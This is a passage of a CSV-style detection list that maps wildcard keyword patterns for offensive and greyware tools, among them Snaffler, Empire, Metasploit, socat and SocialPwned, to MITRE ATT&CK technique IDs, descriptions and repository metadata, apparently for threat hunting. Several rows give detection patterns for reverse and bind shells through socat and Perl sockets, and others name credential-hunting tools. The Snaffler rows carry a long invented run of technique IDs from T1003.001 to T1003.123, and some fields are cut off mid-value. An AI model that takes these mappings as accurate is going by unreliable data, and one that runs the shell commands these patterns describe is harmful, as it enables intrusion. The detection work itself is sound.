- T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*Snaffler.csproj*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters and red teamers to help find delicious candy 
needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1595 - T1592 - T1589 - T1590 - T1591,TA0043,N/A,N/A,Reconnaissance,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*Snaffler.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*snaffler.exe*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - 
T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*snaffler.exe*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1595 - T1592 - T1589 - T1590 - T1591,TA0043,N/A,N/A,Reconnaissance,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*snaffler.log*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1595 - T1592 - T1589 - T1590 - T1591,TA0043,N/A,N/A,Reconnaissance,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*Snaffler.sln*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - 
T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*Snaffler.sln*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1595 - T1592 - T1589 - T1590 - T1591,TA0043,N/A,N/A,Reconnaissance,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z 
-*SnafflerMessage.cs*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*SnafflerMessageType.cs*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles 
(creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*SnaffPoint.exe*,offensive_tool_keyword,SnaffPoint,A tool for pointesters to find candies in SharePoint,T1210.001 - T1087.002 - T1059.006,TA0007 - TA0002 - 
TA0006,N/A,N/A,Discovery,https://github.com/nheiniger/SnaffPoint,1,1,N/A,7,2,191,19,2022-11-04T13:26:24Z,2022-08-25T13:16:06Z -*SnaffPoint-main*,offensive_tool_keyword,SnaffPoint,A tool for pointesters to find candies in SharePoint,T1210.001 - T1087.002 - T1059.006,TA0007 - TA0002 - TA0006,N/A,N/A,Discovery,https://github.com/nheiniger/SnaffPoint,1,1,N/A,7,2,191,19,2022-11-04T13:26:24Z,2022-08-25T13:16:06Z -*snallygaster*,offensive_tool_keyword,snallygaster,Finds file leaks and other security problems on HTTP servers.snallygaster is a tool that looks for files accessible on web servers that shouldn't be public and can pose a security risk.,T1595.001 - T1210,TA0007 - TA0009,N/A,N/A,Information Gathering,https://github.com/hannob/snallygaster,1,0,N/A,N/A,10,2009,240,2023-07-31T07:26:19Z,2018-04-10T12:01:16Z -*sneaky_gophish*,offensive_tool_keyword,gophish,Hiding GoPhish from the boys in blue,T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/puzzlepeaches/sneaky_gophish/,1,1,N/A,10,10,134,37,2022-12-06T11:58:00Z,2021-06-24T12:41:54Z -*SniffAir*,offensive_tool_keyword,SniffAir,SniffAir is an open-source wireless security framework which provides the ability to easily parse passively collected wireless data as well as launch sophisticated wireless attacks. SniffAir takes care of the hassle associated with managing large or multiple pcap files while thoroughly cross-examining and analyzing the traffic. looking for potential security flaws. Along with the prebuilt queries. SniffAir allows users to create custom queries for analyzing the wireless data stored in the backend SQL database. SniffAir is built on the concept of using these queries to extract data for wireless penetration test reports. 
The data can also be leveraged in setting up sophisticated wireless attacks included in SniffAir as modules.,T1530 - T1170 - T1059 - T1201,TA0002 - TA0003 - TA0007 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/Tylous/SniffAir,1,1,N/A,N/A,10,1161,175,2020-10-14T04:00:27Z,2017-02-20T18:32:32Z -*sniffer.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*sniffer-master.zip*,offensive_tool_keyword,sniffer,A modern alternative network traffic sniffer.,T1040 - T1052.001 - T1046 - T1552.002,TA0011 - TA0007 - TA0005,N/A,N/A,Sniffing & Spoofing,https://github.com/chenjiandongx/sniffer,1,1,N/A,N/A,7,668,58,2022-07-27T15:13:57Z,2021-11-08T15:36:03Z -*SnifferSpoofer*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*sniffglue*,offensive_tool_keyword,sniffglue,Secure multithreaded packet sniffer,T1040 - T1041 - T1046 - T1057 - T1071.001,TA0009 - TA0011,N/A,N/A,Sniffing & Spoofing,https://github.com/kpcyrd/sniffglue,1,0,N/A,N/A,10,970,89,2022-07-13T22:44:18Z,2017-09-12T16:26:24Z -*snmp_default_pass.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*snmp-check * -c public*,greyware_tool_keyword,snmpcheck,automate the process of gathering information of any devices with SNMP protocol support. like snmpwalk - snmpcheck allows you to enumerate the SNMP devices and places the output in a very human readable friendly format. It could be useful for penetration testing or systems monitoring,T1046 - T1018,TA0007 - TA0005,N/A,N/A,Reconnaissance,http://www.nothink.org/codes/snmpcheck/index.php,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*snmpwalk -v1 -cpublic *,greyware_tool_keyword,snmpwalk,allows you to enumerate the SNMP devices and places the output in a very human readable friendly format,T1046 - T1018,TA0007 - TA0005,N/A,N/A,Reconnaissance,https://wiki.debian.org/SNMP,1,0,greyware tool - risks of False positive !,5,10,N/A,N/A,N/A,N/A -*snmpwalk * public *1.3.6.1.*,greyware_tool_keyword,snmpwalk,allows you to enumerate the SNMP devices and places the output in a very human readable friendly format,T1046 - T1018,TA0007 - TA0005,N/A,N/A,Reconnaissance,https://wiki.debian.org/SNMP,1,0,greyware tool - risks of False positive !,5,10,N/A,N/A,N/A,N/A -*snmpwalk -c public -v 1 *,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation 
tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*snmpwalk -c public -v 2c *,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*snmpwalk -c public -v1 *,greyware_tool_keyword,snmpwalk,allows you to enumerate the SNMP devices and places the output in a very human readable friendly format,T1046 - T1018,TA0007 - TA0005,N/A,N/A,Reconnaissance,https://wiki.debian.org/SNMP,1,0,greyware tool - risks of False positive !,5,10,N/A,N/A,N/A,N/A -*snmpwn *passwords.txt*,offensive_tool_keyword,snmpwn,SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do,T1210 - T1212 - T1558,TA0001 - TA0002,N/A,N/A,Exploitation tools,https://github.com/hatlord/snmpwn,1,0,N/A,N/A,3,222,50,2020-08-23T10:41:38Z,2016-06-16T10:31:13Z -*snmpwn.rb* --hosts *,offensive_tool_keyword,snmpwn,SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. 
allowing us to cycle through large lists of users to find the ones that do.,T1210 - T1212 - T1558,TA0001 - TA0002,N/A,N/A,Exploitation tools,https://github.com/hatlord/snmpwn,1,0,N/A,N/A,3,222,50,2020-08-23T10:41:38Z,2016-06-16T10:31:13Z -*socat *,offensive_tool_keyword,socat,socat is a relay for bidirectional data transfer between two independent data channels. Each of these data channels may be a file. pipe. device,T1048 - T1055 - T1562,TA0003 - TA0002 - TA0040,N/A,N/A,Data Exfiltration,https://github.com/craSH/socat,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*socat exec:*,greyware_tool_keyword,socat,Shell spawning socat usage ,T1059 - T1105 - T1046,TA0002 - TA0008 - TA0007,N/A,N/A,shell spawning,https://linuxfr.org/news/socat-un-outil-en-ligne-de-commande-pour-maitriser-vos-sockets,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*socat FILE:*tty*raw*echo=0 TCP*:*,greyware_tool_keyword,socat,socat bind shell,T1071 - T1573,TA0002 - TA0011,N/A,N/A,C2,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,10,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*socat file:*tty*raw*echo=0 tcp-listen:*,greyware_tool_keyword,socat,socat reverse shell,T1071 - T1573,TA0002 - TA0011,N/A,N/A,C2,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,10,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*socat -O /tmp/*,greyware_tool_keyword,socat,Shell spawning socat usage ,T1059 - T1105 - T1046,TA0002 - TA0008 - TA0007,N/A,N/A,shell spawning,https://linuxfr.org/news/socat-un-outil-en-ligne-de-commande-pour-maitriser-vos-sockets,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*socat TCP4-LISTEN:* fork TCP4:*:*,greyware_tool_keyword,socat,linux commands abused by attackers,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - 
TA0002,N/A,N/A,Network Exploitation tools,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*socat tcp4-listen:1337*,offensive_tool_keyword,socat,listening on port 1337 -observed in variousmalware and poc explitation tools,T1049 - T1021.001 - T1572,TA0002 - TA0011 - TA0040,N/A,N/A,C2,N/A,1,0,N/A,8,6,N/A,N/A,N/A,N/A -*socat tcp-connect*,greyware_tool_keyword,socat,Shell spawning socat usage ,T1059 - T1105 - T1046,TA0002 - TA0008 - TA0007,N/A,N/A,shell spawning,https://linuxfr.org/news/socat-un-outil-en-ligne-de-commande-pour-maitriser-vos-sockets,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*socat tcp-connect:*:* exec:*bash -li**pty*stderr*setsid*sigint*sane*,greyware_tool_keyword,socat,socat reverse shell,T1105 - T1021.001 - T1021.002,TA0002 - TA0008,N/A,N/A,shell spawning,https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md,1,0,greyware tool - risks of False positive !,N/A,10,51169,13280,2023-10-02T15:13:46Z,2016-10-18T07:29:07Z -*socat tcp-connect:*:* exec:/bin/sh*,greyware_tool_keyword,socat,socat reverse shell,T1071 - T1573,TA0002 - TA0011,N/A,N/A,C2,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,10,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*socat TCP-LISTEN:**reuseaddr*fork EXEC:/bin/sh*,greyware_tool_keyword,socat,socat bind shell,T1071 - T1573,TA0002 - TA0011,N/A,N/A,C2,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,10,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*Social Engineer Toolkit*,offensive_tool_keyword,social-engineer-toolkit,The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec. LLC an information security consulting firm located in Cleveland. 
Ohio.,T1566 - T1059.004 - T1564.001,TA0001 - TA0002 - TA0007,N/A,N/A,Phishing,https://github.com/trustedsec/social-engineer-toolkit,1,0,N/A,N/A,10,9394,2569,2023-08-25T17:25:45Z,2012-12-31T22:01:33Z -*social_engineering/web_cloner*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*SocialPwned.git*,offensive_tool_keyword,SocialPwned,SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.,T1596,TA0002,N/A,N/A,OSINT exploitation tools,https://github.com/MrTuxx/SocialPwned,1,1,N/A,N/A,9,800,93,2023-08-12T21:59:23Z,2020-04-07T22:25:38Z -*socialpwned.py*,offensive_tool_keyword,SocialPwned,SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.,T1596,TA0002,N/A,N/A,OSINT exploitation tools,https://github.com/MrTuxx/SocialPwned,1,1,N/A,N/A,9,800,93,2023-08-12T21:59:23Z,2020-04-07T22:25:38Z -*socialpwned_*.txt*,offensive_tool_keyword,SocialPwned,SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. 
Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.,T1596,TA0002,N/A,N/A,OSINT exploitation tools,https://github.com/MrTuxx/SocialPwned,1,1,N/A,N/A,9,800,93,2023-08-12T21:59:23Z,2020-04-07T22:25:38Z -*socket(S*PF_INET*SOCK_STREAM*getprotobyname(*tcp*))*if(connect(S*sockaddr_in($p*inet_aton($i))))*,greyware_tool_keyword,shell,Reverse Shell Command Line,T1105 - T1021.001 - T1021.002,TA0002 - TA0008,N/A,N/A,shell spawning,https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml,1,1,greyware tool - risks of False positive !,N/A,10,6749,1943,2023-10-03T04:55:17Z,2016-12-24T09:48:49Z -*SocketHijacking.*,offensive_tool_keyword,ConPtyShell,ConPtyShell - Fully Interactive Reverse Shell for Windows,T1021 - T1071,TA0002,N/A,N/A,Exploitation tools,https://github.com/antonioCoco/ConPtyShell,1,1,N/A,N/A,9,817,150,2023-01-20T10:52:52Z,2019-09-13T22:11:18Z -*socks*127.0.0.1 9050*,offensive_tool_keyword,proxychains,(TOR default) proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy,T1090.004 - T1090.003 - T1027,TA0001 - TA0006 - TA0040,N/A,N/A,Exploitation tools,https://github.com/haad/proxychains,1,0,N/A,N/A,10,5489,586,2023-04-05T10:32:16Z,2011-02-25T12:27:05Z -*socks5_exe.exe*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*socks5h://127.0.0.1:9050*,offensive_tool_keyword,MaccaroniC2,A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper 
